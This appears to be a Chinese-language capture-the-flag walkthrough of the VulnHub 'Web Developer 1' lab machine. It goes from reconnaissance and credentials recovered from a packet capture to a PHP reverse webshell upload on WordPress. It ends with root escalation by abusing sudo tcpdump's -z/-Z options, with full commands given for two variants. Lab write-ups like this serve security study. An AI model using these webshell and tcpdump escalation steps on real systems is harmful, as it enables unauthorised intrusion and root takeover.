靶机地址：https://www.vulnhub.com/entry/web-developer-1,288/

开机界面 就是这样

同样是选择桥接

确定靶机的IP地址：192.168.1.10

靶机开放了22和80端口

还是wordpress框架

访问康康呗

dirb直接扫目录

发现好多目录/ipdata /wp-admin

有一个数据包 用wireshark 打开分析一下

过滤下http的数据包信息 然后就发现了 账号密码

账号：webdeveloper
密码：Te5eQg&4sBS!Yr$)wf%(DcAd

成功登录

kali中找php的webshell

进行修改为kali本机的IP

进行上传

上传成功

直接访问一下

路径：/wp-content/uploads/year/month/xx.php

http://192.168.1.10//wp-content/uploads/2021/02/5.php

拿到shell

不允许 sudo提权

进入/var/www/html/目录–>wp-config.php

看看配置文件

发现账号密码

账号：webdeveloper
密码：MasterOfTheUniverse

进行ssh登录

登录成功

查看sudo提权

通过root执行tcpdump指令 获取flag 这个之前总结过

tcpdump命令详解：

-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备（不输出数据包结果）
-W [num] 指定抓包数量
-G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令

那就直接上呗

• 1.在该用户中创建文件

touch /tmp/exploit

• 2.写入shellcode

echo 'cat /root/flag.txt' > /tmp/exploit

• 3.赋予该文件执行权限

chmod +x /tmp/exploit

• 4.执行tcpdump指令，得到flag.txt

sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

成功拿到flag

WireShark主要分析什么：

ARP(Address Resolution Protocol)
TCP(Transmission Control Protocol)
HTTP(Hypertext Transfer Protocol)

这边在记录一下 大佬的提权 大佬的入口是修改 这里的404.php文件

用到的是/var/www/html/wp-content/themes/twentysixteen/404.php

为什么是/twentysixteen这个目录呢

因为 这个目录有修改权限

综合 一下命令：

echo $'php /var/www/html/wp-content/themes/twentysixteen/404.php' > /tmp/.a001
chmod +x /tmp/.a001
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.a001 -Z root

这样是可以提到root权限的

ok 这台靶机就到这里